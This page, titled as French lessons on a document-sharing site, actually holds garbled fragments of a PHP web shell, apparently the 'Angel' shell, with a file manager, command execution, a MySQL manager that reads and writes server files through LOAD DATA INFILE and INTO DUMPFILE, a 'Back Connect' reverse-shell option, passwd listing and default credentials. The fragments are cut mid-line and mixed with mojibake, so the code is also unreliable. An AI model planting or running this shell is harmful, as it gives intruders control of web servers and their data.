bai giang tieng phap

Page 4$result = q"select load_file'$mysqldlfile';"; if!$result{ q"DROP TABLE IF EXISTS tmp_angel;"; q"CREATE TABLE tmp_angel content LONGBLOB NOT NULL;"; q"LOAD DATA LOCAL INFILE '".adds

Trang 2

Page 2

/*===================== ộ…ỗẵđỗằ“ổŸ =====================*/

if ($charset == 'utf8') {

header("content-Type: text/html; charset=utf-8");

} elseif ($charset == 'big5') {

header("content-Type: text/html; charset=big5");

} elseif ($charset == 'gbk') {

header("content-Type: text/html; charset=gbk");

} elseif ($charset == 'latin1') {

header("content-Type: text/html; charset=iso-8859-2");

p('<meta http-equiv="refresh" content="1;URL='.$self.'">');

p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');

p('<meta http-equiv="refresh" content="1;URL='.$self.'">');

p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');

Trang 4

Page 4

$result = q("select load_file('$mysqldlfile');");

if(!$result){

q("DROP TABLE IF EXISTS tmp_angel;");

q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");

q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY ' angel_{$timestamp}_eof ' ESCAPED BY '' LINES TERMINATED BY ' angel_{$timestamp}_eof ';");

$result = q("select content from tmp_angel");

q("DROP TABLE tmp_angel");

.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}

.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}

.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}

.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}

Trang 5

//ỗ”ăổ—ảộ—´ổˆ³ổƠốĂăỗÔºổˆêổ–-<tr class="alt1">

<a href="javascript:goaction('logout');">Logout</a> |

<a href="javascript:goaction('file');">File Manager</a> |

<a href="javascript:goaction('sqladmin');">MySQL Manager</a> |

<a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |

<a href="javascript:goaction('shell');">Execute Command</a> |

<a href="javascript:goaction('phpenv');">PHP Variable</a> |

<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>

if (!$action || $action == 'file') {

$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';

// ồˆÔổ–-ố¯ằồ†™ổƒ…ồ†à

// ồˆ ộ™Ôỗ›đồẵ•

Trang 7

} else {

$time = strtotime("$year-$month-$day $hour:$minute:$second");

m('Modify file the last modified '.(@touch($curfile

Trang 8

<tr>

<td nowrap>Current Directory (<?php echo $dir_writeable;?>

<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td> <td nowrap><input class="bt" value="GO" type="submit"></td>

Trang 10

Page 10

tbhead();

p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');

p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');

p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');

if (IS_WIN && IS_COM) {

$obj = new COM('scripting.filesystemobject');

if ($obj && is_object($obj)) {

$DriveTypeDB = array(0 => 'Unknow'

Trang 11

foreach($dirdata as $key => $dirdb){

if($dirdb['filename']!=' ' && $dirdb['filename']!='.') {

$thisbg = bg();

p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');

p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');

p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');

p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');

foreach($filedata as $key => $filedb){

if($filedb['filename']!=' ' && $filedb['filename']!='.') {

$fileurl = str_replace(SA_ROOT

$thisbg = bg();

p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');

p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');

p('<td nowrap>'.$filedb['mtime'].'</td>');

Trang 12

$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");

m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());

!$dbhost && $dbhost = ($_COOKIE['dbhost']!=''?$_COOKIE['dbhost']:'localhost');

!$dbuser && $dbuser = ($_COOKIE['dbuser']!=''?$_COOKIE['dbuser']:'root');

!$dbport && $dbport = ($_COOKIE['dbport']!=''?$_COOKIE['dbport']:3306);

!$dbpass && $dbpass = ($_COOKIE['dbpass']!=''?$_COOKIE['dbpass']:'t00r');

!$dbname && $dbname = ($_COOKIE['dbname']!=''?$_COOKIE['dbname']:'information_schema');

!$charset && $charset = ($_COOKIE['charset']!=''?$_COOKIE['charset']:'');

Trang 13

p('<p><b>This operation the DB user must has FILE privilege</b></p>');

p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');p('<h2>Download file</h2>');

p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');

elseif ($action == 'sqladmin') {

!$dbhost && $dbhost = ($_COOKIE['dbhost']!=''?$_COOKIE['dbhost']:'localhost');

!$dbuser && $dbuser = ($_COOKIE['dbuser']!=''?$_COOKIE['dbuser']:'root');

!$dbport && $dbport = ($_COOKIE['dbport']!=''?$_COOKIE['dbport']:3306);

!$dbpass && $dbpass = ($_COOKIE['dbpass']!=''?$_COOKIE['dbpass']:'t00r');

!$charset && $charset = ($_COOKIE['charset']!=''?$_COOKIE['charset']:'');

Trang 17

if ($tablename && !$sql_query) {

$sql_query = "SELECT * FROM $tablename";

if(is_string($sql_history)) p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2"> Query history:</td></tr><tr><td>'.$sql_history.'</td></tr></table></p>');

p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_querymakehide('tablename'

Trang 18

} elseif ($doing == 'insert' || $doing == 'edit') {

$result = q('SHOW COLUMNS FROM '.$tablename);

while ($row = mysql_fetch_array($result)) {

p('<table border="0" cellpadding="3" cellspacing="0">');

foreach ($rowdb as $row) {

p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');}

Trang 20

Page 20

$table_num = $table_rows = $data_size = 0;

$tabledb = array();

while($table = mysql_fetch_array($query)) {

$data_size = $data_size + $table['Data_length'];

$table_rows = $table_rows + $table['Rows'];

p('<table border="0" cellpadding="0" cellspacing="0">');

p('<form action="'.$self.'" method="POST">');

p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');

p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\'

Trang 23

p('<hr width="100%" noshade /><pre>');

if ($execfunc=='wscript' && IS_WIN && IS_COM) {

Trang 24

Page 24

fwrite($pipes[0]

Trang 26

if (($mode & 0xC000) === 0xC000) {$type = 's';}

elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}elseif (($mode & 0x8000) === 0x8000) {$type = '-';} elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}else {$type = '?';}

$owner['read'] = ($mode & 00400) ? 'r' : '-';

$owner['write'] = ($mode & 00200) ? 'w' : '-';

$owner['execute'] = ($mode & 00100) ? 'x' : '-';

$group['read'] = ($mode & 00040) ? 'r' : '-';

$group['write'] = ($mode & 00020) ? 'w' : '-';

$group['execute'] = ($mode & 00010) ? 'x' : '-';

$world['read'] = ($mode & 00004) ? 'r' : '-';

$world['write'] = ($mode & 00002) ? 'w' : '-';

// åŽ»æŽ‰è½¬ä¹‰å-—ç¬¦

// æ¸…é™¤HTMLä»£ç 

Trang 27

return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';}

Trang 29

if (count($filelist)>0){

foreach($filelist as $filename){

if (is_file($filename)){

Trang 30

while ($file = readdir($dh)) {

if($file!='.' && $file!=' '){

var $datasec = array();

var $ctrl_dir = array();

Trang 32

Page 32

$tabledump = "DROP TABLE IF EXISTS $table;\n";

$tabledump = "CREATE TABLE $table (\n";

$firstfield=1;

$fields = q("SHOW FIELDS FROM $table");

while ($field = mysql_fetch_array($fields)) {

$keys = q("SHOW KEYS FROM $table");

while ($key = mysql_fetch_array($keys)) {

Trang 33

Page 33

Trang 35

''

$password);

Trang 36

Page 36

$thefile)).'.zip');

$dbuser

Trang 37

td{font: 12px Arial

Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}

Monospace;background:#fff;border: 1px solid #666;padding:2px;}

Tahoma;height:22px;}

Trang 38

Page 38

''

$dir);

-1) != '/') {

Trang 39

$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));

'w');

$filecontent) ? 'success' : 'failed'));

8

$newperm) ? 'success' : 'failed'));

$nname) ? ' success' : 'failed'));

Trang 41

$nowpath);

2);

<?php echo getChmod($nowpath);?>)</td>

Trang 43

1 => 'Removable'

filemtime($filepath));

Trang 45

filesize($filename));

$dbuser

Trang 53

\'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\'

Trang 57

elseif ($action == 'phpenv') {

$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';

$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');

!$dis_func && $dis_func = 'No';

7 => array('Server Web Port',$_SERVER['SERVER_PORT']),

8 => array('PHP run mode',strtoupper(php_sapi_name())),

9 => array('The file path', FILE ),

function scookie($key, $value, $life = 0, $prefix = 1) {

global $admin, $timestamp, $_SERVER;

$key = ($prefix ? $admin['cookiepre'] : '').$key;

$life = $life ? $life : $admin['cookielife'];

$from = $curpage - $offset;

$to = $curpage + $page - $offset - 1;

$from = $curpage - $pages + $to;

$to = $pages;

if(($to - $from) < $page && ($to - $from) < $pages) {

$from = $pages - $page + 1;

}}

$multipage = ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');

$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';

<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">

</form>

<?php

exit;

Trang 58

$mtime = explode(' ', microtime());

$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);

echo 'Processed in '.$totaltime.' second(s)';

}

//ố¿žổŽƠổ•°ổđồº“

function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {

if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {

p('<h2>Can not connect to MySQL server</h2>');

if($link && mysql_get_server_info() > '4.1') {

if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {

q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;

Định dạng
Số trang	198
Dung lượng	67,75 KB